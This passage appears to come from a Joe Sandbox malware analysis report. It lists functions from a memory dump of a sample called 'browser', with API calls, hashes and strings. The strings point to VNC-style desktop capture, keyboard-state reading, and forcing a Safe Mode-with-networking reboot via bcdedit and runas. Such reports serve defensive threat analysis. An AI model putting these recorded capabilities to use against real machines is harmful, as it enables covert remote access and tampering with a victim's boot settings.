                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                            • String ID: UseRegistry$admin$locdom3
                                                                            • API String ID: 1788981264-1943432916
                                                                            • Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                            • Instruction ID: 491b67d34d693a6d895b8a49d7e48187aed07d1b974e051b7b7bbcfe96f74e13
                                                                            • Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                            • Instruction Fuzzy Hash: 56015E24A1858391FA60DF31A4913F563A1EF9930EFC00432DECDC679ADEBCE148D600
                                                                            Function 00007FF6C2BAC210 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFindMode$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2885216544-0
                                                                            • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                            • Instruction ID: ff17b01cf8a0db96c1690e99da0d71976c0cab4dda08e47ee17118cf167becc0
                                                                            • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                            • Instruction Fuzzy Hash: AF010035A0878586DA608F21B4542A973A1FB4DBE5F404231DEAD83794DE7DD8459B40
                                                                            Function 00007FF6C2B8C390 Relevance: 3.1, APIs: 2, Instructions: 107networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recvsend
                                                                            • String ID:
                                                                            • API String ID: 740075404-0
                                                                            • Opcode ID: 18c2c4f1f16459f623e6aed15e8c4918751a6ada723bebe609739826a73a5893
                                                                            • Instruction ID: 2170e2b297d74c998a4bd98364f3934f78e8b86c2f2f4df8e0872fd1c5578e38
                                                                            • Opcode Fuzzy Hash: 18c2c4f1f16459f623e6aed15e8c4918751a6ada723bebe609739826a73a5893
                                                                            • Instruction Fuzzy Hash: 8341F77260878245D7754B74B5007B97AA0EB4ABADF5C4336DEED83BC6CE6CD1458700
                                                                            Function 00007FF6C2BA31B0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32 ref: 00007FF6C2BA31D3
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97509
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97523
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B9753D
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97557
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97571
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B9758B
                                                                              • Part of subcall function 00007FF6C2B974C0: TryEnterCriticalSection.KERNEL32 ref: 00007FF6C2B975D6
                                                                              • Part of subcall function 00007FF6C2B974C0: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2B9760F
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: State$CriticalSection$EnterKeyboardLeave
                                                                            • String ID:
                                                                            • API String ID: 4104749118-0
                                                                            • Opcode ID: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                                            • Instruction ID: 5f657f8f6f2592df1fb6c294d44ff608e602e194a1d7207c0ab852e4248413a5
                                                                            • Opcode Fuzzy Hash: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                                            • Instruction Fuzzy Hash: E3F0BE61A1858081E2749B22E8253B6B2A0FF8974EF484231DECC467A6CF6CE569DA00
                                                                            Function 00007FF6C2BAEBF0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 242sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
                                                                            • String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
                                                                            • API String ID: 2560957196-1231019345
                                                                            • Opcode ID: d3761e2cde1ec7064ee2b6525e6bdb12875f7b6778e20ecae9fde7fdee8a08df
                                                                            • Instruction ID: bc428c38b6c9051a379e209dfdb8c1561de1eb1382e2b5efd89688884457690c
                                                                            • Opcode Fuzzy Hash: d3761e2cde1ec7064ee2b6525e6bdb12875f7b6778e20ecae9fde7fdee8a08df
                                                                            • Instruction Fuzzy Hash: D0B17922A08A8285EB60DF61D8905F93360FF81B8EF444432DE8E97BA5CFBCE555D350
                                                                            Function 00007FF6C2C4DC9C Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DCE1
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DCFD
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD0F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD26
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD2F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD46
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD4F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD66
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD6F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD8E
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD97
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DDCA
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DDDA
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DE30
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DE51
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DE6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                            • API String ID: 2643518689-564504941
                                                                            • Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                            • Instruction ID: 9853199134b4347de50b38c53f1280b2c8f165eb6726e2e8d6cd933c6ae22bd7
                                                                            • Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                            • Instruction Fuzzy Hash: 67510428A0AB4381FED4EF51B85417523B4BF59B9EF440575DE8E833A0EFBCE8559240
                                                                            Function 00007FF6C2B93210 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
                                                                            • String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
                                                                            • API String ID: 3746257916-1709497384
                                                                            • Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                            • Instruction ID: 82ce3254abdbc6cd6210a73f372ac3551fa451592263af9b772b1b594a3def66
                                                                            • Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                            • Instruction Fuzzy Hash: 14710D35A19A8699E750CF64E8806E933B0FB08369F405636EBAD877D4DFBCD129C740
                                                                            Function 00007FF6C2B90430 Relevance: 36.2, APIs: 24, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$CombineCreateOffsetRect
                                                                            • String ID:
                                                                            • API String ID: 960235054-0
                                                                            • Opcode ID: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                                            • Instruction ID: fe91537b621a4bf3816e5efd535b068ff13ad541c542ff6edd5beed199bd1d17
                                                                            • Opcode Fuzzy Hash: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                                            • Instruction Fuzzy Hash: B5913936B08A4296EB60DF62E8546AD7370FB99B8DF408031DF8E97B55DF68E505C340
                                                                            Function 00007FF6C2B937E0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
                                                                            • String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
                                                                            • API String ID: 3443580464-3826360582
                                                                            • Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                            • Instruction ID: 81598ef48449ba2cf19942446147cc816c2ea4ffb4ac53156d2c9a244aad4ce7
                                                                            • Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                            • Instruction Fuzzy Hash: B2610C35A15A8699E750CF64E8846E933B0FB0836DF401636EBAD86BD8DFBCD119C740
                                                                            Function 00007FF6C2B8CF80 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 254libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
                                                                            • String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
                                                                            • API String ID: 3955186772-955988753
                                                                            • Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                            • Instruction ID: 73fe71a9a1ce86dd947385f7fc6f1dba7fffa8a646d1b9104c2f234f3eaeca05
                                                                            • Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                            • Instruction Fuzzy Hash: BCB19C25A18A8381EA51DF34A4802F967A1FF4679EF548636EE8D87BC5DFACD509C300
                                                                            Function 00007FF6C2C4844C Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 206COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo_wsopen_s
                                                                            • String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
                                                                            • API String ID: 2053332431-1561892669
                                                                            • Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                            • Instruction ID: 978ec0c613b0ade723e5251a69efeb3a4343e9dac628ae0d365f4f874297c810
                                                                            • Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                            • Instruction Fuzzy Hash: 4671BCA2E0C20241FBF65E25AD9437B1AF26F1175EF585631CFCE867C9DEACE9408600
                                                                            Function 00007FF6C2B944B0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 195windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
